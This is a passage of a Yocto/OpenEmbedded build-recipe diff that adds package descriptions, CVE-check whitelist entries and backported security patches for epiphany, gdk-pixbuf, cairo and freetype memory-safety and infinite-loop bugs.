27SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145" 30SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
28UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar" 31UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb
index 97e5e57533..18b5d8648e 100644
--- a/meta/recipes-extended/zip/zip_3.0.bb
+++ b/meta/recipes-extended/zip/zip_3.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Compressor/archiver for creating and modifying .zip files" 1SUMMARY = "Compressor/archiver for creating and modifying .zip files"
2HOMEPAGE = "http://www.info-zip.org" 2HOMEPAGE = "http://www.info-zip.org"
3DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
3SECTION = "console/utils" 4SECTION = "console/utils"
4 5
5LICENSE = "BSD-3-Clause" 6LICENSE = "BSD-3-Clause"
diff --git a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
index ddb4c2794f..f43bfd6a67 100644
--- a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
+++ b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
@@ -1,4 +1,7 @@
1SUMMARY = "WebKit based web browser for GNOME" 1SUMMARY = "WebKit based web browser for GNOME"
2DESCRIPTION = "Epiphany is an open source web browser for the Linux desktop environment. \
3It provides a simple and easy-to-use internet browsing experience."
4HOMEPAGE = "https://wiki.gnome.org/Apps/Web"
2BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany" 5BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany"
3LICENSE = "GPLv3+" 6LICENSE = "GPLv3+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 7LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -13,6 +16,7 @@ REQUIRED_DISTRO_FEATURES = "x11 opengl"
13 16
14SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \ 17SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \
15 file://0002-help-meson.build-disable-the-use-of-yelp.patch \ 18 file://0002-help-meson.build-disable-the-use-of-yelp.patch \
19 file://CVE-2022-29536.patch \
16 " 20 "
17SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b" 21SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b"
18SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d" 22SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d"
diff --git a/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
new file mode 100644
index 0000000000..71cfc1238a
--- /dev/null
+++ b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
@@ -0,0 +1,46 @@
1CVE: CVE-2022-29536
2Upstream-Status: Backport [ https://gitlab.gnome.org/GNOME/epiphany/-/commit/486da133569ebfc436c959a7419565ab102e8525 ]
3Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
4
5From 486da133569ebfc436c959a7419565ab102e8525 Mon Sep 17 00:00:00 2001
6From: Michael Catanzaro <mcatanzaro@redhat.com>
7Date: Fri, 15 Apr 2022 18:09:46 -0500
8Subject: [PATCH] Fix memory corruption in ephy_string_shorten()
9
10This fixes a regression that I introduced in 232c613472b38ff0d0d97338f366024ddb9cd228.
11
12I got my browser stuck in a crash loop today while visiting a website
13with a page title greater than ephy-embed.c's MAX_TITLE_LENGTH, the only
14condition in which ephy_string_shorten() is ever used. Turns out this
15commit is wrong: an ellipses is a multibyte character (three bytes in
16UTF-8) and so we're writing past the end of the buffer when calling
17strcat() here. Ooops.
18
19Shame it took nearly four years to notice and correct this.
20
21Part-of: <https://gitlab.gnome.org/GNOME/epiphany/-/merge_requests/1106>
22---
23 lib/ephy-string.c | 5 ++---
24 1 file changed, 2 insertions(+), 3 deletions(-)
25
26diff --git a/lib/ephy-string.c b/lib/ephy-string.c
27index 35a148ab32..8e524d52ca 100644
28--- a/lib/ephy-string.c
29+++ b/lib/ephy-string.c
30@@ -114,11 +114,10 @@ ephy_string_shorten (char *str,
31 /* create string */
32 bytes = GPOINTER_TO_UINT (g_utf8_offset_to_pointer (str, target_length - 1) - str);
33
34- /* +1 for ellipsis, +1 for trailing NUL */
35- new_str = g_new (gchar, bytes + 1 + 1);
36+ new_str = g_new (gchar, bytes + strlen ("…") + 1);
37
38 strncpy (new_str, str, bytes);
39- strcat (new_str, "…");
40+ strncpy (new_str + bytes, "…", strlen ("…") + 1);
41
42 g_free (str);
43
44--
45GitLab
46
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
new file mode 100644
index 0000000000..fe594b24bb
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch
@@ -0,0 +1,40 @@
1From 086e8adf4cc352cd11572f96066b001b545f354e Mon Sep 17 00:00:00 2001
2From: Emmanuele Bassi <ebassi@gnome.org>
3Date: Wed, 1 Apr 2020 18:11:55 +0100
4Subject: [PATCH] Check the memset length argument
5
6Avoid overflows by using the checked multiplication macro for gsize.
7
8Fixes: #132
9
10Upstream-Status: Backported [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/086e8adf4cc352cd11572f96066b001b545f354e]
11CVE: CVE-2021-20240
12
13Signed-off-by: Changqing Li <changqing.li@windriver.com>
14---
15 gdk-pixbuf/io-gif-animation.c | 6 +++++-
16 1 file changed, 5 insertions(+), 1 deletion(-)
17
18diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
19index c9db3c66e..49674fd2e 100644
20--- a/gdk-pixbuf/io-gif-animation.c
21+++ b/gdk-pixbuf/io-gif-animation.c
22@@ -412,11 +412,15 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
23
24 /* If no rendered frame, render the first frame */
25 if (anim->last_frame == NULL) {
26+ gsize len = 0;
27 if (anim->last_frame_data == NULL)
28 anim->last_frame_data = gdk_pixbuf_new (GDK_COLORSPACE_RGB, TRUE, 8, anim->width, anim->height);
29 if (anim->last_frame_data == NULL)
30 return NULL;
31- memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, gdk_pixbuf_get_rowstride (anim->last_frame_data) * anim->height);
32+ if (g_size_checked_mul (&len, gdk_pixbuf_get_rowstride (anim->last_frame_data), anim->height))
33+ memset (gdk_pixbuf_get_pixels (anim->last_frame_data), 0, len);
34+ else
35+ return NULL;
36 composite_frame (anim, g_list_nth_data (anim->frames, 0));
37 }
38
39--
40GitLab
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
new file mode 100644
index 0000000000..b29ab209ce
--- /dev/null
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch
@@ -0,0 +1,61 @@
1From bdf3a2630c02a63803309cf0ad4b274234c814ce Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Tue, 9 Aug 2022 09:45:42 +0530
4Subject: [PATCH] CVE-2021-46829
5
6Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/commit/5398f04d772f7f8baf5265715696ed88db0f0512]
7CVE: CVE-2021-46829
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 gdk-pixbuf/io-gif-animation.c | 21 +++++++++++++--------
11 1 file changed, 13 insertions(+), 8 deletions(-)
12
13diff --git a/gdk-pixbuf/io-gif-animation.c b/gdk-pixbuf/io-gif-animation.c
14index d742963..9544391 100644
15--- a/gdk-pixbuf/io-gif-animation.c
16+++ b/gdk-pixbuf/io-gif-animation.c
17@@ -364,7 +364,7 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
18 for (i = 0; i < n_indexes; i++) {
19 guint8 index = index_buffer[i];
20 guint x, y;
21- int offset;
22+ gsize offset;
23
24 if (index == frame->transparent_index)
25 continue;
26@@ -374,11 +374,13 @@ composite_frame (GdkPixbufGifAnim *anim, GdkPixbufFrame *frame)
27 if (x >= anim->width || y >= anim->height)
28 continue;
29
30- offset = y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + x * 4;
31- pixels[offset + 0] = frame->color_map[index * 3 + 0];
32- pixels[offset + 1] = frame->color_map[index * 3 + 1];
33- pixels[offset + 2] = frame->color_map[index * 3 + 2];
34- pixels[offset + 3] = 255;
35+ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
36+ g_size_checked_add (&offset, offset, x * 4)) {
37+ pixels[offset + 0] = frame->color_map[index * 3 + 0];
38+ pixels[offset + 1] = frame->color_map[index * 3 + 1];
39+ pixels[offset + 2] = frame->color_map[index * 3 + 2];
40+ pixels[offset + 3] = 255;
41+ }
42 }
43
44 out:
45@@ -443,8 +445,11 @@ gdk_pixbuf_gif_anim_iter_get_pixbuf (GdkPixbufAnimationIter *anim_iter)
46 x_end = MIN (anim->last_frame->x_offset + anim->last_frame->width, anim->width);
47 y_end = MIN (anim->last_frame->y_offset + anim->last_frame->height, anim->height);
48 for (y = anim->last_frame->y_offset; y < y_end; y++) {
49- guchar *line = pixels + y * gdk_pixbuf_get_rowstride (anim->last_frame_data) + anim->last_frame->x_offset * 4;
50- memset (line, 0, (x_end - anim->last_frame->x_offset) * 4);
51+ gsize offset;
52+ if (g_size_checked_mul (&offset, gdk_pixbuf_get_rowstride (anim->last_frame_data), y) &&
53+ g_size_checked_add (&offset, offset, anim->last_frame->x_offset * 4)) {
54+ memset (pixels + offset, 0, (x_end - anim->last_frame->x_offset) * 4);
55+ }
56 }
57 break;
58 case GDK_PIXBUF_FRAME_REVERT:
59--
602.25.1
61
diff --git a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
index 54861e83c6..1171e6cc11 100644
--- a/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
+++ b/meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb
@@ -25,6 +25,8 @@ SRC_URI = "${GNOME_MIRROR}/${BPN}/${MAJ_VER}/${BPN}-${PV}.tar.xz \
25 file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \ 25 file://0006-Build-thumbnailer-and-tests-also-in-cross-builds.patch \
26 file://missing-test-data.patch \ 26 file://missing-test-data.patch \
27 file://CVE-2020-29385.patch \ 27 file://CVE-2020-29385.patch \
28 file://CVE-2021-20240.patch \
29 file://CVE-2021-46829.patch \
28 " 30 "
29 31
30SRC_URI_append_class-target = " \ 32SRC_URI_append_class-target = " \
diff --git a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
index 3a2727b701..5503f225bb 100644
--- a/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
+++ b/meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "GTK+ icon theme" 1SUMMARY = "GTK+ icon theme"
2DESCRIPTION = "The Adwaita icon theme is the default icon theme of the GNOME desktop \
3This package package contains an icon theme for Gtk+ 3 applications."
2HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme" 4HOMEPAGE = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme"
3BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues" 5BUGTRACKER = "https://gitlab.gnome.org/GNOME/adwaita-icon-theme/issues"
4SECTION = "x11/gnome" 6SECTION = "x11/gnome"
diff --git a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
index 92b0d1d52f..0842f10ea9 100644
--- a/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
+++ b/meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb
@@ -102,7 +102,7 @@ EOF
102 # from the target sysroot. 102 # from the target sysroot.
103 cat > ${B}/g-ir-scanner-wrapper << EOF 103 cat > ${B}/g-ir-scanner-wrapper << EOF
104#!/bin/sh 104#!/bin/sh
105# This prevents g-ir-scanner from writing cache data to $HOME 105# This prevents g-ir-scanner from writing cache data to user's HOME dir
106export GI_SCANNER_DISABLE_CACHE=1 106export GI_SCANNER_DISABLE_CACHE=1
107 107
108g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@" 108g-ir-scanner --lib-dirs-envvar=GIR_EXTRA_LIBS_PATH --use-binary-wrapper=${STAGING_BINDIR}/g-ir-scanner-qemuwrapper --use-ldd-wrapper=${STAGING_BINDIR}/g-ir-scanner-lddwrapper --add-include-path=${STAGING_DATADIR}/gir-1.0 --add-include-path=${STAGING_LIBDIR}/gir-1.0 "\$@"
diff --git a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
index 0306b04f4e..6b59029255 100644
--- a/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
+++ b/meta/recipes-gnome/libnotify/libnotify_0.7.8.bb
@@ -1,4 +1,8 @@
1SUMMARY = "Library for sending desktop notifications to a notification daemon" 1SUMMARY = "Library for sending desktop notifications to a notification daemon"
2DESCRIPTION = "It sends desktop notifications to a notification daemon, as defined \
3in the Desktop Notifications spec. These notifications can be used to inform \
4the user about an event or display some form of information without getting \
5in the user's way."
2HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify" 6HOMEPAGE = "https://gitlab.gnome.org/GNOME/libnotify"
3BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues" 7BUGTRACKER = "https://gitlab.gnome.org/GNOME/libnotify/issues"
4SECTION = "libs" 8SECTION = "libs"
@@ -20,3 +24,6 @@ PROVIDES += "libnotify3"
20RPROVIDES_${PN} += "libnotify3" 24RPROVIDES_${PN} += "libnotify3"
21RCONFLICTS_${PN} += "libnotify3" 25RCONFLICTS_${PN} += "libnotify3"
22RREPLACES_${PN} += "libnotify3" 26RREPLACES_${PN} += "libnotify3"
27
28# -7381 is specific to the NodeJS bindings
29CVE_CHECK_WHITELIST += "CVE-2013-7381"
diff --git a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
index 237aec6062..ef1dae0a69 100644
--- a/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
+++ b/meta/recipes-gnome/librsvg/librsvg_2.40.21.bb
@@ -25,6 +25,9 @@ SRC_URI += "file://gtk-option.patch \
25 25
26SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba" 26SRC_URI[archive.sha256sum] = "f7628905f1cada84e87e2b14883ed57d8094dca3281d5bcb24ece4279e9a92ba"
27 27
28# Issue only on windows
29CVE_CHECK_WHITELIST += "CVE-2018-1000041"
30
28CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders" 31CACHED_CONFIGUREVARS = "ac_cv_path_GDK_PIXBUF_QUERYLOADERS=${STAGING_LIBDIR_NATIVE}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders"
29 32
30PACKAGECONFIG ??= "gdkpixbuf" 33PACKAGECONFIG ??= "gdkpixbuf"
diff --git a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
index 72511af02d..8b5d301515 100644
--- a/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
+++ b/meta/recipes-gnome/libsecret/libsecret_0.20.1.bb
@@ -4,6 +4,7 @@ the freedesktop.org project, a cross-desktop effort to access passwords, \
4tokens and other types of secrets. libsecret provides a convenient wrapper \ 4tokens and other types of secrets. libsecret provides a convenient wrapper \
5for these methods so consumers do not have to call the low-level DBus methods." 5for these methods so consumers do not have to call the low-level DBus methods."
6LICENSE = "LGPLv2.1" 6LICENSE = "LGPLv2.1"
7HOMEPAGE = "https://github.com/GNOME/libsecret"
7BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues" 8BUGTRACKER = "https://gitlab.gnome.org/GNOME/libsecret/issues"
8LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6" 9LIC_FILES_CHKSUM = "file://COPYING;md5=23c2a5e0106b99d75238986559bb5fc6"
9 10
diff --git a/meta/recipes-graphics/builder/builder_0.1.bb b/meta/recipes-graphics/builder/builder_0.1.bb
index 0a64c31ab3..9d5cd8cde6 100644
--- a/meta/recipes-graphics/builder/builder_0.1.bb
+++ b/meta/recipes-graphics/builder/builder_0.1.bb
@@ -29,3 +29,5 @@ do_install () {
29 chown builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh 29 chown builder.builder ${D}${sysconfdir}/mini_x/session.d/builder_session.sh
30} 30}
31 31
32# -4178 is an unrelated 'builder'
33CVE_CHECK_WHITELIST = "CVE-2008-4178"
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
index 5232cf70c6..a2dba6cb20 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch
@@ -1,19 +1,20 @@
1There is a potential infinite-loop in function _arc_error_normalized(). 1There is an assertion in function _cairo_arc_in_direction().
2 2
3CVE: CVE-2019-6461 3CVE: CVE-2019-6461
4Upstream-Status: Pending 4Upstream-Status: Pending
5Signed-off-by: Ross Burton <ross.burton@intel.com> 5Signed-off-by: Ross Burton <ross.burton@intel.com>
6 6
7diff --git a/src/cairo-arc.c b/src/cairo-arc.c 7diff --git a/src/cairo-arc.c b/src/cairo-arc.c
8index 390397bae..f9249dbeb 100644 8index 390397bae..1bde774a4 100644
9--- a/src/cairo-arc.c 9--- a/src/cairo-arc.c
10+++ b/src/cairo-arc.c 10+++ b/src/cairo-arc.c
11@@ -99,7 +99,7 @@ _arc_max_angle_for_tolerance_normalized (double tolerance) 11@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr,
12 do { 12 if (cairo_status (cr))
13 angle = M_PI / i++; 13 return;
14 error = _arc_error_normalized (angle);
15- } while (error > tolerance);
16+ } while (error > tolerance && error > __DBL_EPSILON__);
17 14
18 return angle; 15- assert (angle_max >= angle_min);
19 } 16+ if (angle_max < angle_min)
17+ return;
18
19 if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) {
20 angle_max = fmod (angle_max - angle_min, 2 * M_PI);
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
index 4e4598c5b5..7c3209291b 100644
--- a/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch
@@ -1,20 +1,40 @@
1There is an assertion in function _cairo_arc_in_direction().
2
3CVE: CVE-2019-6462 1CVE: CVE-2019-6462
4Upstream-Status: Pending 2Upstream-Status: Backport
5Signed-off-by: Ross Burton <ross.burton@intel.com> 3Signed-off-by: Quentin Schulz <quentin.schulz@theobroma-systems.com>
4
5From ab2c5ee21e5f3d3ee4b3f67cfcd5811a4f99c3a0 Mon Sep 17 00:00:00 2001
6From: Heiko Lewin <hlewin@gmx.de>
7Date: Sun, 1 Aug 2021 11:16:03 +0000
8Subject: [PATCH] _arc_max_angle_for_tolerance_normalized: fix infinite loop
9
10---
11 src/cairo-arc.c | 4 +++-
12 1 file changed, 3 insertions(+), 1 deletion(-)
6 13
7diff --git a/src/cairo-arc.c b/src/cairo-arc.c 14diff --git a/src/cairo-arc.c b/src/cairo-arc.c
8index 390397bae..1bde774a4 100644 15index 390397bae..1c891d1a0 100644
9--- a/src/cairo-arc.c 16--- a/src/cairo-arc.c
10+++ b/src/cairo-arc.c 17+++ b/src/cairo-arc.c
11@@ -186,7 +186,8 @@ _cairo_arc_in_direction (cairo_t *cr, 18@@ -90,16 +90,18 @@ _arc_max_angle_for_tolerance_normalized (double tolerance)
12 if (cairo_status (cr)) 19 { M_PI / 11.0, 9.81410988043554039085e-09 },
13 return; 20 };
21 int table_size = ARRAY_LENGTH (table);
22+ const int max_segments = 1000; /* this value is chosen arbitrarily. this gives an error of about 1.74909e-20 */
14 23
15- assert (angle_max >= angle_min); 24 for (i = 0; i < table_size; i++)
16+ if (angle_max < angle_min) 25 if (table[i].error < tolerance)
17+ return; 26 return table[i].angle;
18 27
19 if (angle_max - angle_min > 2 * M_PI * MAX_FULL_CIRCLES) { 28 ++i;
20 angle_max = fmod (angle_max - angle_min, 2 * M_PI); 29+
30 do {
31 angle = M_PI / i++;
32 error = _arc_error_normalized (angle);
33- } while (error > tolerance);
34+ } while (error > tolerance && i < max_segments);
35
36 return angle;
37 }
38--
392.38.1
40
diff --git a/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
new file mode 100644
index 0000000000..fb6ce5cfdf
--- /dev/null
+++ b/meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch
@@ -0,0 +1,60 @@
1Fix stack buffer overflow.
2
3CVE: CVE-2020-35492
4Upstream-Status: Backport
5Signed-off-by: Ross Burton <ross.burton@arm.com>
6
7From 03a820b173ed1fdef6ff14b4468f5dbc02ff59be Mon Sep 17 00:00:00 2001
8From: Heiko Lewin <heiko.lewin@worldiety.de>
9Date: Tue, 15 Dec 2020 16:48:19 +0100
10Subject: [PATCH] Fix mask usage in image-compositor
11
12---
13 src/cairo-image-compositor.c | 8 ++--
14 test/Makefile.sources | 1 +
15 test/bug-image-compositor.c | 39 ++++++++++++++++++++
16 test/reference/bug-image-compositor.ref.png | Bin 0 -> 185 bytes
17 4 files changed, 44 insertions(+), 4 deletions(-)
18 create mode 100644 test/bug-image-compositor.c
19 create mode 100644 test/reference/bug-image-compositor.ref.png
20
21diff --git a/src/cairo-image-compositor.c b/src/cairo-image-compositor.c
22index 79ad69f68..4f8aaed99 100644
23--- a/src/cairo-image-compositor.c
24+++ b/src/cairo-image-compositor.c
25@@ -2601,14 +2601,14 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
26 unsigned num_spans)
27 {
28 cairo_image_span_renderer_t *r = abstract_renderer;
29- uint8_t *m;
30+ uint8_t *m, *base = (uint8_t*)pixman_image_get_data(r->mask);
31 int x0;
32
33 if (num_spans == 0)
34 return CAIRO_STATUS_SUCCESS;
35
36 x0 = spans[0].x;
37- m = r->_buf;
38+ m = base;
39 do {
40 int len = spans[1].x - spans[0].x;
41 if (len >= r->u.composite.run_length && spans[0].coverage == 0xff) {
42@@ -2655,7 +2655,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
43 spans[0].x, y,
44 spans[1].x - spans[0].x, h);
45
46- m = r->_buf;
47+ m = base;
48 x0 = spans[1].x;
49 } else if (spans[0].coverage == 0x0) {
50 if (spans[0].x != x0) {
51@@ -2684,7 +2684,7 @@ _inplace_src_spans (void *abstract_renderer, int y, int h,
52 #endif
53 }
54
55- m = r->_buf;
56+ m = base;
57 x0 = spans[1].x;
58 } else {
59 *m++ = spans[0].coverage;
60--
diff --git a/meta/recipes-graphics/cairo/cairo_1.16.0.bb b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
index 8663dec404..4827374ffc 100644
--- a/meta/recipes-graphics/cairo/cairo_1.16.0.bb
+++ b/meta/recipes-graphics/cairo/cairo_1.16.0.bb
@@ -27,6 +27,7 @@ SRC_URI = "http://cairographics.org/releases/cairo-${PV}.tar.xz \
27 file://CVE-2018-19876.patch \ 27 file://CVE-2018-19876.patch \
28 file://CVE-2019-6461.patch \ 28 file://CVE-2019-6461.patch \
29 file://CVE-2019-6462.patch \ 29 file://CVE-2019-6462.patch \
30 file://CVE-2020-35492.patch \
30 " 31 "
31 32
32SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552" 33SRC_URI[md5sum] = "f19e0353828269c22bd72e271243a552"
diff --git a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
index 7d9db1f38c..73315c97ec 100644
--- a/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gst-3.0.inc
@@ -1,5 +1,9 @@
1SUMMARY = "GStreamer integration library for Clutter" 1SUMMARY = "GStreamer integration library for Clutter"
2DESCRIPTION = "Clutter-Gst is an integration library for using GStreamer with Clutter. \
3It provides a GStreamer sink to upload frames to GL and an actor that \
4implements the ClutterGstPlayer interface using playbin."
2HOMEPAGE = "http://www.clutter-project.org/" 5HOMEPAGE = "http://www.clutter-project.org/"
6BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter-gst/-/issues"
3LICENSE = "LGPLv2+" 7LICENSE = "LGPLv2+"
4 8
5inherit clutter features_check upstream-version-is-even gobject-introspection 9inherit clutter features_check upstream-version-is-even gobject-introspection
diff --git a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
index 7bf2278555..9a28b5219b 100644
--- a/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
+++ b/meta/recipes-graphics/clutter/clutter-gtk-1.0.inc
@@ -1,5 +1,10 @@
1SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application" 1SUMMARY = "Library for embedding a Clutter canvas in a GTK+ application"
2DESCRIPTION = "Clutter-GTK is a library providing facilities to integrate Clutter into GTK+ \
3applications and vice versa. It provides a GTK+ widget, GtkClutterEmbed, for embedding the \
4a Clutter stage into any GtkContainer; and GtkClutterActor, a Clutter \
5actor for embedding any GtkWidget inside a Clutter stage."
2HOMEPAGE = "http://www.clutter-project.org/" 6HOMEPAGE = "http://www.clutter-project.org/"
7BUGTRACKER = "https://gitlab.gnome.org/GNOME/clutter/-/issues"
3LICENSE = "LGPLv2+" 8LICENSE = "LGPLv2+"
4 9
5CLUTTERBASEBUILDCLASS = "meson" 10CLUTTERBASEBUILDCLASS = "meson"
diff --git a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
index fa8a29b798..31f9e32dc2 100644
--- a/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
+++ b/meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch
@@ -6,10 +6,13 @@ Subject: [PATCH] [sfnt] Fix heap buffer overflow (#59308).
6This is CVE-2020-15999. 6This is CVE-2020-15999.
7 7
8* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier. 8* src/sfnt/pngshim.c (Load_SBit_Png): Test bitmap size earlier.
9CVE: CVE-2020-15999
9 10
10Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd] 11Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=a3bab162b2ae616074c8877a04556932998aeacd]
11 12
12Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> 13Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
14Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
15Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
13--- 16---
14 src/sfnt/pngshim.c | 14 +++++++------- 17 src/sfnt/pngshim.c | 14 +++++++-------
15 1 file changed, 7 insertions(+), 7 deletions(-) 18 1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
new file mode 100644
index 0000000000..e66400ddb1
--- /dev/null
+++ b/meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch
@@ -0,0 +1,33 @@
